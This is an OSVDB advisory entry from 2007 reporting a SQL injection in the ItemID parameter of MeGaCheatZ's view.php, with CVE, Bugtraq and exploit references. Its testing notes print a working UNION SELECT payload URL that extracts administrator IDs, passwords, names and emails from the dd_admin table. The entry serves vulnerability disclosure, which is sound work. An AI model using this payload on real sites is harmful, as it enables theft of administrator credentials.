MeGaCheatZ view.php ItemID Variable SQL Injection

2007-12-19T00:00:00
ID: OSVDB:40025
Type: osvdb
Reporter: OSVDB
Modified: 2007-12-19T00:00:00

Description

Manual Testing Notes

http://[target]/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin/*

References:

Related OSVDB ID: 1020366
Related OSVDB ID: 40026
Other Advisory URL: http://www.inj3ct-it.org/exploit/megacheatz.1.1.txt
Generic Exploit URL: http://www.milw0rm.com/exploits/4778
CVE-2007-6557
Bugtraq ID: 26999